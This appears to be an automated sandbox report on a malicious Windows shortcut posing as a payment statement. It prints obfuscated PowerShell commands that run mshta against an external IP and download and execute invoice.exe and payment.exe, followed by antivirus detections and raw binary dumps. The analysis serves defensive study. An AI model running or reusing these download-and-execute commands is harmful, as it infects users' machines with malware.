Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Jan. 18, 2022, 4:40 p.m. | Jan. 18, 2022, 4:43 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RZcvibqEQ" C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk
2192-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));
2272-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
1088-
invoice.exe "C:\Users\test22\AppData\Roaming\invoice.exe"
2756 -
payment.exe "C:\Users\test22\AppData\Roaming\payment.exe"
2892
-
-
-
-
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://179.43.187.183/hhfm/invoice.hta | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://179.43.187.183/hhfm/invoice.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://179.43.187.183/hhfm/payment.exe |
request | GET http://179.43.187.183/hhfm/invoice.hta |
request | GET http://179.43.187.183/hhfm/invoice.exe |
request | GET http://179.43.187.183/hhfm/payment.exe |
file | C:\Users\test22\AppData\Roaming\invoice.exe |
file | C:\Users\test22\AppData\Roaming\payment.exe |
file | C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR)); |
cmdline | "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta |
file | C:\Users\test22\AppData\Roaming\invoice.exe |
file | C:\Users\test22\AppData\Roaming\payment.exe |
Bkav | VEX.Webshell |
Sangfor | Trojan.Generic-LNK.Save.08c86e64 |
Symantec | CL.Downloader!gen111 |
ESET-NOD32 | LNK/TrojanDownloader.Agent.AJP |
Tencent | Win32.Trojan-downloader.Agent.Eerv |
Sophos | Troj/LnkObf-G |
SentinelOne | Static AI - Suspicious LNK |
VBA32 | Trojan.Link.ShellCmd |
Zoner | Probably Heur.LNKScript |
Data received | k (#%d) at 0x%p. CRT detected that the application wrote to memory after end of heap buffer. HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory after end of heap buffer. Memory allocated at %hs(%d). HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory before start of heap buffer. HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p. CRT detected that the application wrote to memory before start of heap buffer. Memory allocated at %hs(%d). Client hook free failure. The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long. %hs located at 0x%p is %Iu bytes long. Memory allocated at %hs(%d). HEAP CORRUPTION DETECTED: on top of Free block at 0x%p. CRT detected that the application wrote to a heap buffer that was freed. HEAP CORRUPTION DETECTED: on top of Free block at 0x%p. CRT detected that the application wrote to a heap buffer that was freed. Memory allocated at %hs(%d). DAMAGED_heapchk fails with unknown return value! _heapchk fails with _HEAPBADPTR. _heapchk fails with _HEAPBADEND. _heapchk fails with _HEAPBADNODE. _heapchk fails with _HEAPBADBEGIN. _CrtSetDbgFlag(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)Bad memory block found at 0x%p. Bad memory block found at 0x%p. Memory allocated at %hs(%d). _CrtMemCheckpointstate != NULLObject dump complete. crt block at 0x%p, subtype %x, %Iu bytes long. normal block at 0x%p, %Iu bytes long. client block at 0x%p, subtype %x, %Iu bytes long. {%ld} %hs(%d) : #File Error#(%d) : Dumping objects -> Data: <%s> %s _printMemBlockData%.2X Detected memory leaks! LC_TIMELC_NUMERICLC_MONETARYLC_CTYPELC_COLLATELC_ALLüF@0[BðF@0OH0[BäF@0OH.AØF@0OH@UBÌF@0OHðQBÄF@0OHÀGB !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.csetlocaleLC_MIN <= _category && _category <= LC_MAXstrncpy_s(lctemp, (sizeof(lctemp) / sizeof(lctemp[0])), s, len)_setlocale_nolock;=;strcpy_s(pch + sizeof(int), cch - sizeof(int), lctemp)_setloca |
Data received | ¸~E°ðå$ÿÿÿI#P"hÿÿÿ~\Eôêj9 $ÿÿÿjEÂøC.m¼èÊ?E°^è2 hÿÿÿãcM Èþÿÿcww ÈþÿÿÏçÍ{Eô&)$ÿÿÿqjÁ ÈþÿÿiõªVmlÒGmT°æc3E<Û(shÿÿÿÒ"Èþÿÿwml÷[PE8vpÁ& ÿÿÿ¶|Elcäì m¤/m¹M hÿÿÿø68m ý¾Ohÿÿÿí»s hÿÿÿ·ÑCmËEô7¬EpEºø¦{ ÿÿÿoÙâ_lÿÿÿuÕ, lÿÿÿ¹3môD,mcÐð0 hÿÿÿÍM}mô9´êmô+O ÿÿÿ%(? $ÿÿÿ;{_àþÿÿ@øENVFhÿÿÿÆ*á6E881vkhÿÿÿñsÏÐþÿÿÔQ+` $ÿÿÿÝñìb Èþÿÿ]ÔEÌܧ=$ÿÿÿ¾ÑU.EØcjs.m8Øtym¤i¼KmæS4mTý@»_E̲o}kEA¹ÀZ $ÿÿÿ÷¸ 4ÿÿÿºP,mXZm8×Îl àþÿÿ ØþÿÿL¹dmÊJÿÿÿÕЫjmô¥Ù= ,ÿÿÿ9UuEàÔíÏ&m=aÒtmà:»Ú& ØþÿÿÅSX ÿÿÿ¶(½wmà/bE´E̸èE@Xlä/ DÿÿÿyVmô&xpÿÿÿZ¢;E°/±xEÌs¢J lÿÿÿõ±§Cm8{dpmÌ+LXE¸¥Þ ÿÿÿÍÖÐþÿÿfqÂ$ÿÿÿY÷wnm^¢x ÿÿÿ§,%xmBÄâqml@ ,ÿÿÿ,^ÓmT¦Êp xÿÿÿ3ÀyEÿÔ7# lÿÿÿ×h&E8;)ElJUÁm¼% Ðþÿÿ·w¥E¼øÂEüU )màRÛ% ðþÿÿ°XEnÖõC(ÿÿÿ|x? ÿÿÿ³´TEÀå¢K]Èþÿÿ¸JnE¼¦ÍQm8fâNÿÿÿ¶Ó:D pÿÿÿSªn äþÿÿj=àþÿÿë Èþÿÿý· mT+X àþÿÿ¹ð#EKñB ÿÿÿíT1mÔ8zEüÆIMEèea½ pÿÿÿoÈO lÿÿÿf)âkE¤Ü¨²TE.Ñ8 0ÿÿÿà1`EvY¾Pm8Þ5ìm¬«rÿÿÿFý~ Ðþÿÿ*ÜRÿÿÿµÃeÿÿÿ;3¬T (ÿÿÿÒ8NEðvr(8ÿÿÿ?1EÄhò hÿÿÿ¾|Rd8ÿÿÿ&Y pÿÿÿô7ómü ôs(ÿÿÿygEø¶(!m:øWvElM®*E8A2Ý2mؼÓîEØ¡gC ðþÿÿ ÿã-mH¾9Î>m¼[õXtÿÿÿÆè ÿÿÿÜÒ ETé5E¼ög¦wLÿÿÿaúW4 ÿÿÿCÒx ,ÿÿÿ¤>qlÿÿÿð¶³EÌÁ¼m¿,ØKm¤ q4ÿÿÿÁ<E@ƦE Ó·J Pÿÿÿ Lÿÿÿ¿_nm\õÕ[miEBÑomÏ)mð3ÚHÿÿÿ Å Øþÿÿ!a*äþÿÿc(ÿÿÿSÖþ|EB´Î2Eèë'Ðþÿÿ< yE´æ EÜSFEhm@à À_àþÿÿ¢# 0ÿÿÿÆû$1E<}§9 4ÿÿÿÈþÜþÿÿÿ£Ñ<m¸jdÿÿÿÒ$ÌþÿÿÞmèű.*ÿÿÿ¹à±ÈþÿÿgL< DÿÿÿJìyðþÿÿ¼±dE¸: 4ÿÿÿ¼jîxEÌp&7E\!}knHÿÿÿÊ!màä¤Hÿÿÿ¯F Ìþÿÿ*/0^tÿÿÿ{(æôþÿÿãP Im>ÕkEðR>mQ E¼iÚ @ÿÿÿ{:X1EHIYmø.KgzE8KÝõOE³µ? ÿÿÿR)[Ew¡è:XÿÿÿPÔAXmèç²umàpf$Gdÿÿÿû*ë ÿÿÿKó<øþÿÿP¥cEÈ#l xÿÿÿy*C(E¶{môwÈì6EXëU HÿÿÿH¥ù èþÿÿÚ|2IE°);M ÿÿÿRïp.mÔz¶q ÿÿÿkë¸ÿÿÿY¼Wm¤ü ÿÿÿ²Ò0E$éYl <ÿÿÿª?,EÆ¿FÿÿÿI73 m(REàí¦Ï_ lÿÿÿ¼ÅTml 9m´í)E Fánpm´^×úmV#zmÝ2ÇImè*Dÿÿÿm·pHm¼Q£äm¬6mÒJÿÿÿÓÞÇrEd¨kmÀBec xÿÿÿîþÅmdsq!mä¨X ØþÿÿEùìBE,W¡ð4mÇ# ^ ôþÿÿLº°Z èþÿÿ<ØF TÿÿÿdVbüþÿÿÿEì.LúiEPx°L9TÿÿÿLí¯$ |ÿÿÿ0þh ÈþÿÿBr)Dm±S±mméf\Kmgï Im¸bd8Lÿÿÿ¾× ÿÿÿÞ|k7mÐÒõpÿÿÿçtPÿÿÿkR¦xm«¨, Üþÿÿ3P¦00ÿÿÿ°Ü.BED©5 ,ÿÿÿúÞj-E /Y>mhZÅQEè|\úVàþÿÿã07 ÈþÿÿF®Wj ôþÿÿñ¨qmÑsþ `ÿÿÿéåEÀbEü:qm$÷PGmX»{\ÿÿÿÜí|ÿÿÿzõ-\ÿÿÿ?©7m@`¸?E4ò¸9m@O¥àAìþÿÿ6 ÄE4ø$5mhõqEaÌETªúÚc Lÿÿÿ}ºïmP¹t÷Eå)£(E0 øþÿÿ¯jDfPÿÿÿGu=Èþÿÿ.« Ðþÿÿûm([To ÔþÿÿmÎþ?tÿÿÿ_&am`Fs(Eàm¨ôA øþÿÿ*QRfmÈ vÿEÌymL·Î*dm¥z×'ExM|)ÅpÉÂD$L$)ÂD$L$)ÂÂUìQeüEEüEü3EMÉÂUìQÇEüEEümüEMü1ÉÂUìMEEEE]ÂU |
Data received | t8}Ðt2ÿUÔEì}ìtUàRjEðPjMìQÿUÐ ÀtUøâuÇEÜ}Üt E Eë[ Ø`;MütØ`RèÈØÿÿÄEÌ}ÌtÿUÌEè}èt,¡Ü`;Eüt" Ü`QèØÿÿÄEÈ}Èt UèRÿUÈEè¡Ô`PèyØÿÿÄEÄ}ÄtMQUREPMèQÿUÄëë3Àå]ÃÿUìQEEüMüQjUREPMQURèíÄå]ÃÌÌÿUìQEEüMü·EüÀEü ÒtëëEü+EÑøèå]ÃÿUìì(}t}v ÇEèëÇEèEèEô}ôuhd@jjh¨S@jèJÿÿÄøuÌ}ôu0èǽÿÿÇjjh¨S@hèc@hd@èHÿÿĸéX} ¿3ÒEf}ÿtK}ÿÿÿtB}v<Mé9 TCHsTCHUäë EèEäMäÑáQhþUÂRèüTÿÿÄ3À}ÀEð}ðuhlS@jjh¨S@jèBIÿÿÄøuÌ}ðu0èþ¼ÿÿÇjjh¨S@hèc@hlS@èPGÿÿĸéUUüEEøMüUffMü·EüÀEüMÁM Òt UøêUøtëË}ø Ò3ÀMf}ÿtJ}ÿÿÿtA}v;Uê9TCHs ¡TCHEàë MéMàUàÑâRhþEÀPèóSÿÿĹDS@ Ét 3Òt ÇEÜëÇEÜEÜEì}ìuhS@jjh¨S@jè"HÿÿÄøuÌ}ìu-èÞ»ÿÿÇ"jjh¨S@hèc@hS@è0Fÿÿĸ"ër}ÿtj}ÿÿÿtaU+UøÂ;UsSE+EøÀM+È9 TCHsTCHUØëE+EøÀM+ÈMØUØÑâRhþE+EøMTARè SÿÿÄ3Àå]ÃÿUì=ø`ujEPMQURhPHè*ÄëëjEPMQURjèÄ]ÃÌÌÌÌÌÌÌÌÌÿUìjÿh¨Cd¡PìH¡dCH3ÅPEôd£EPMÔè]XÿÿÇEü}tMU3À}ÀEÌ}Ìuh e@jj^hÀd@jè±FÿÿÄøuÌ}ÌuDèmºÿÿÇjj^hÀd@h¬d@h e@è¿DÿÿÄÇEÄÇEüÿÿÿÿMÔè¶XÿÿEÄé}t}|}$~ ÇE´ëÇE´U´UÈ}ÈuhXd@jj_hÀd@jèFÿÿÄøuÌ}ÈuDè×¹ÿÿÇjj_hÀd@h¬d@hXd@è)DÿÿÄÇEÀÇEüÿÿÿÿMÔè XÿÿEÀévMMðÇEÐUðEçMðÁMðMÔè"Xÿÿ Àt0MÔèXÿÿº¬~MÔèXÿÿPj¶EçPèHÄE°ëj¶MçQMÔèßWÿÿPèIGÄE°}°tUðEçMðÁMðë¾Uçú-uEÈEMðUçEðÀEðë¾Mçù+uUðEçMðÁMð}|}t}$~.}tUEÇE¼ÇEüÿÿÿÿMÔèWÿÿE¼ékë>}u8¾Mçù0t ÇE ë&Uð¾øxtMð¾úXu ÇEëÇE}u8¾Eçø0t ÇE ë&Mð¾úxtEð¾ùXu ÇEëÇE}u9¾Uçú0u0Eð¾ùxtUð¾øXuMðÁMðUðEçMðÁMð¸ÿÿÿÿ3Ò÷uEèj¶UçRMÔèdVÿÿPèÎEÄ Àt¾Eçè0EìëQh¶MçQMÔè9VÿÿPè£EÄ Àt0¾Uçúa|¾Eçøz¾Mçé M¬ë¾UçU¬E¬è7EìëëfMì;Mrë\UÊUEÐ;EèrMÐ;MèuÈÿ3Ò÷u9UìwUЯUUìUÐëEÈE}uëMðUçEðÀEðé!ÿÿÿMðéMðUâu}tEEðÇEÐëfMáu*UâuVEàt }ÐwMáu=}Ðÿÿÿv4è¶ÿÿÇ"Uât ÇEÐÿÿÿÿëEàt ÇEÐëÇEÐÿÿÿ}tMUðEàtMÐ÷ÙMÐUÐU¸ÇEüÿÿÿÿMÔè¥TÿÿE¸Môd Yå]ÃÌÌÌÿUì=ø`ujEPMQURhPHè*ÄëëjEPMQURjèÄ]ÃÌÌÌÌÌÌÌÌÌÿUìjÿhØCd¡PìlVW¡dCH3ÅPEôd£EPMÐè+SÿÿÇEü}tMU3À}ÀEÀ}Àuh e@jj^hPe@jèAÿÿÄøuÌ}ÀuNè;µÿÿÇjj^hPe@h<e@h e@è?ÿÿÄÇE´ÇE¸ÇEüÿÿÿÿMÐè}SÿÿE´U¸é<}t}|}$~ ÇE ëÇE U U¼}¼uhXd@jj_hPe@jèß@ÿÿÄøuÌ}¼uNè´ÿÿÇjj_hPe@h<e@hXd@èí>ÿÿÄÇE¬ÇE°ÇEüÿÿÿÿMÐèÝRÿÿE¬U°éMMðÇEÄÇEÈUðEãMðÁMðMÐèÕRÿÿ Àt0MÐèÉRÿÿº¬~MÐè¶RÿÿPj¶EãPèÉBÄE |
Data received | ÀEü}üuhÄ$@jjbh@jèD.þÿÄøuÌ}üu0è¢þÿÇjjbh@hd@hÄ$@èR,þÿĸÿÿÿé3Ò}ÂUø}øuh4$@jjch@jèÞ-þÿÄøuÌ}øu-è¡þÿÇjjch@hd@h4$@èì+þÿĸÿÿÿë&MQURèþÿÿÄëëjEPMQèÏüÿÿÄå]ÃÌÌÌÌÌÌÌÌÿUìì@}!EPMèèÂ>þÿ3É}ÁMä}äuhÄ$@jj;h¸@jè+-þÿÄøuÌ}äu=èç þÿÇjj;h¸@h@hÄ$@è9+þÿÄÇEØÿÿÿMèè7?þÿEØé¤3À}ÀEà}àuh4$@jj<h¸@jè¸,þÿÄøuÌ}àu=èt þÿÇjj<h¸@h@h4$@èÆ*þÿÄÇEÔÿÿÿMèèÄ>þÿEÔé1ºÿÿÿ;UÀÀEÜuhx@jj=h¸@jèE,þÿÄøuÌ}Üu=è þÿÇjj=h¸@h@hx@èS*þÿÄÇEÐÿÿÿMèèQ>þÿEÐé¾Mèèq>þÿzu)EPMQURè$ÄEÌMèè>þÿEÌéëmE¶MÄMèè/>þÿPUÄRè"ÄEüEÀEM¶UÀMèè>þÿPEÀPèÛ!ÄEøMÁMUêUt}ütEü;EøtMü+MøMÈMèè=þÿEÈë3Àå]ÃÌÌÌÌÌÌÌÿUìì=ø` Y3À}ÀEü}üu!hÄ$@jhh¸@jèñ*þÿÄøuÌ}üu3èþÿÇjhh¸@h@hÄ$@èü(þÿĸÿÿÿé3Ò}ÂUø}øu!h4$@jhh¸@jè *þÿÄøuÌ}øu3èAþÿÇjhh¸@h@h4$@è(þÿĸÿÿÿé¹ÿÿÿ;MÒÂUôu!hx@jhh¸@jè*þÿÄøuÌ}ôu0èÕþÿÇjhh¸@h@hx@è$(þÿĸÿÿÿë.MQUREPè "ÄëëjMQUREPè?üÿÿÄå]ÃÌÌÌÌÌÌÌÌÿUìjþhp,Ch0Ad¡PÄðSVW¡dCH1Eø3ÅPEðd£ÇEäÿÿÿÿ3À}ÀEà}àuht+@jj/h@@jè@)þÿÄøuÌ}àu+èüþÿÇjj/h@@h0@ht+@èN'þÿÄÈÿëWUBà@tMÇAë=URè6þÿÄÇEüEPèCÄEäÇEüþÿÿÿèë MQè¦þÿÄÃEäMðd Y_^[å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÿUììÇEøÿÿÿÿ3À}ÀEô}ôuh-@jjZh@@jèZ(þÿÄøuÌ}ôu.èþÿÇjjZh@@h @h-@èh&þÿÄÈÿéUUüEüHátaUüRèðþÿÄEøEüPè#ÄMüQèeõþÿÄPè Ä À} ÇEøÿÿÿÿë$UüztjEüHQèÕXþÿÄUüÇBEüÇ@Eøå]ÃÌÌÌÌÌÌÌÿUìQ}·E;è`¨MÁùUâÁâ`¾LáUÁúEàÁà`<ÿth=@CHu<UUü}üt}üt}ütë"jjöÿ@ëjjõÿ@ë jjôÿ@EÁøMáÁá `Çÿÿÿÿ3ÀëëèþÿÇ è¹þÿÇÈÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÿUìì}þuèþÿÇèRþÿÇ Èÿé2}|E;è`s ÇEôëÇEôMôMü}üu!h@jh:hà@jè/&þÿÄøuÌ}üu<èþÿÇèàþÿÇ jh:hà@hÀ@h@è/$þÿÄÈÿé¢EÁøMáÁá `¾D à÷ØÀ÷ØEøu!h|@jh;hà@jè£%þÿÄøuÌ}øu9èþÿÇèTþÿÇ jh;hà@hÀ@h|@è£#þÿÄÈÿëUÁúEàÁà`å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUìjþh,Ch0Ad¡PÄðSVW¡dCH1Eø3ÅPEðd£EÁøMáÁá `MàÇEäUàzuaj ènþÿÄÇEüEàxu.h MàÁQèÚ¡ÿÿÄ ÀuÇEäUàBÀMàAÇEüþÿÿÿèëj èXþÿÄÃ}ät!UÁúEàÁà`TRÿ8@EäMðd Y_^[å]ÃÌÌÌÌÌÌÌÌÿUìEÁøMáÁá `D Pÿ<@]ÃÌÌÌÌÌÌÌÌÿUìì¡dCH3ÅEô=(RHts=´RHþuè÷=´RHÿu¸ÿÿé°ëPjEüPjMQ´RHRÿ@ Àu)=(RHuÿ¸@øxuÇ(RHë¸ÿÿëjë Ç(RH=(RHuQjjjEìPjMQjÿÈ@Pÿ`@Eø=´RHÿtjUüREøPMìQ´RHRÿ@ Àu¸ÿÿëfEMô3ÍèÚiþÿå]ÃÌÌÌÌÌÌÿU |
Data received | üg«vÍEê$kuôÓ8xsrZÙ²Í×u ¯éç!ý=·;-ÏÇ9 íV¢Ð-}!Þ$Ë~Ä|`Ñ~ !÷xË·H¤×Ï¢!*ì¾Dä*ÂÕ }3ag > ¢co6 Ìã§«>¿ßzø!ó!ÑF ö)ëcBk. E;sU/$¾*bÁ´1¹LÉ[r,¾-ß Å¢Èò¶Ñµé®±¬é#£-qÈ:æ®ÙëÒn¨-ìdºÀ0üKÊÑxzîÈ rÖÆwä¾9 uGphñ\LbÔÕ·¤Uµ+âçã,Ø£W5å&êìFû¸@Y/¡¸<p0tA4ÛEAþgA£gÇk=½»Jêe£ÊnÏp¦¬®h²ïÄ+ϵOðú¥©UÙ «5©èdãÔ²ì¾T´Èoy½-)ÂE¼@DÃîÞ,!ÆÚ×î§ÃôéÛåãW³¡µ$1 åÓßÈç$°¿åáiq:ÇP)M*k<õJþê .´¦!njJ¤;Vtì|ñï3 ä=pYÀ,¹Ò` `ðë¶v!£¯wØäþÎW]«ÐôÓQ]µÇÿ3ì¥%Ì$(·h* âØZÅ1ÑS%õúTÖl!A»H^½«çõ»ºD0DÈmkQ È×øÉÎ$¤ )²àÏÏßUºÃmlE÷?½ÃQ¤ÙÑõ;ÕkIC¹pP|mÒS560ÓwáccJAh?ÍxhVP³Ìêí{³ÅÑhÁó£ÁGáç×ÃÙ±JÑúÁ_1(6w}γD¸jçÅCP]%êk(ØnÜ_m³º]èÎ,ò+G;YÌr¨ÖßȦ;ÛµT&hMÏhÃIÅÈ[Æî 4ù#V"1Éý9 O6·Ãó_/ 8H(° Ã7fÝ &+¤² NA|ËãD>(0½! mZ7.ÓPeh8EñZZEÜÔB2KÊ4¯ #¹]a´WâòæÍçÍ©+éÝ*jÞÍ$ì«h®üO Gí\³Ní< ¸¸ ´#°«i%×x36Ó06d§RnÿPÂQþ²Î¨Öõo{#âJgé±Ì![¤¹*xßK!OѰÊä©Á<NBJÀ=hTÅaý¿éZ²?;f!!µ2Y¤mímA&Êëf» ¹õ|Ì1)mÞ C>й`íaq«`Åõô¬z}°µQêö¿¡[À׳Ïݪ¢¥±ÐQuïÇØÖTÉ%qcR EG¶®#sG´+ËëAm4x&'ú§>¢³É+ôÎ9ÝÄïÀ\ÚPÓ´íBøJ$eûnwpW²nÛiêxefûäwÓ±<ö?ßgáy¾ ·ÝßX®ûpÉֿΡüYÝzsmüC#/(`ÌÙ¹ñJ`±Àoó ½ûz0péÃìyz@cËj;W¸C}ÌñhΫÄHM¬dð¨_ò·BÈÓÍÉUH¡ îêÇpåÁI<ñtãQîjEzh*Òôxh îAºØ6V«Y=#%UæçéOÒþesó¯é7eB¾À¥ûÓ#§3üR#Í`Ö{DܵgR1o@av8øºQ~¶PQö¼{4óWÑpÀ8±8eÀ§qn#**#}|íê$Õ¸; ¦Âý¡{*]ÐvúîWÞù´ÉÍ-tÊki*2êßÈ%\Ñ\·Ý j~~ûVz'K0Ûo´Çû O@³!¹£IÇ£û¡L? Ó>êjñ¶Íð©o²µ',iî%¶·|äBzjEÀß6ìIfÁhMzę̈çìÚí×:þ¢iùY[¼ýåzKbÛ²ô·Ô,ívkk¹úö^²lTȶØ`áb@dEÏ3 u+¨Wê`Wf!ùs úwþµoƾHÇ µü|ÓË.íôÞª2ÑKîßU5ý^ãr63ts?_2^ßZ:b,¯±q<e/bÕR# Wyr 7Rú¯Ö§ý@;:¿DÚ:k. ¨0å2g<ÃçÖ×Qÿ®0ÄçÈÄ[®àxÒ,â»=+þbg[hÈÉû÷c ù-ñÔ¯BaÏ Ð»ÿ´RÔ¯¶\}bÂwfuz?ËÌöI) 6Zø¹w4£HßTJD>7¯#Åõc¨Ì©t¬Zm1ýã1é§®§ß'©{½KILDi¯uõìRï$±ªÚviNoð½å9kÏ`ÙV££3Ê;V°¨ÙoCùBævn8õ`Í¢KTÌuoçU ×·%8ö¹{&S¿ÑS Åú¤éè±]ÙGà C×1\Å9ò9næ73 ߩЧïõNú« UbnÒ'ó#Ú8ô§ÑR«bùÛ[zú¢þb5Ä¿áBtÝ*(kÜ×ötËcx%[¡Y#}¡»lÁ:ÕXþo½ìq)ÐJ ¹çÁ_u¥KaÅÓS,µö7 z sj*k_x§Ú`éT"Ç^{ãPâ°þì¹ÎG#ãú§´ÔDÞÒ¢)wzï$¼÷^2 0Ì0aOÖÛ§ïSáK .$y©QÇh^+¥0R*þb³ÙqSW3)´ËXuÒU?1éª1|}g«õ%äÈs£M¿_ÆðFÆbàsþ O?¾n_~¥ +Ç'®6gFy.ÌÕ[º¿{b>AMîa¤ä°IÄNi|PªÁ¸~Ôa±3beÌ?Òes¾ÿ L.6PÔ-}êD«?<Æðý¿åqf¹fM`e¯`:-©®æob4_Ý\VÌî÷\ò ºúÔ!~ßl¦jS½Då V.°Ì/<ìðèÛô.'¹x¶ÃÌɬpøøUòsjg¥ }¿~Y3¸èÞ3¹dPÄ£6^åµ^NX9üPêêÛ·°ò¨uå.£-¤ !°`'e˾+ikçÀ]{ñ6 ùKñ_|¥ÐW0Ç-N{ôk®^ü¹I/î¶à&®ÏkTù05¡Ð×d$y(h© 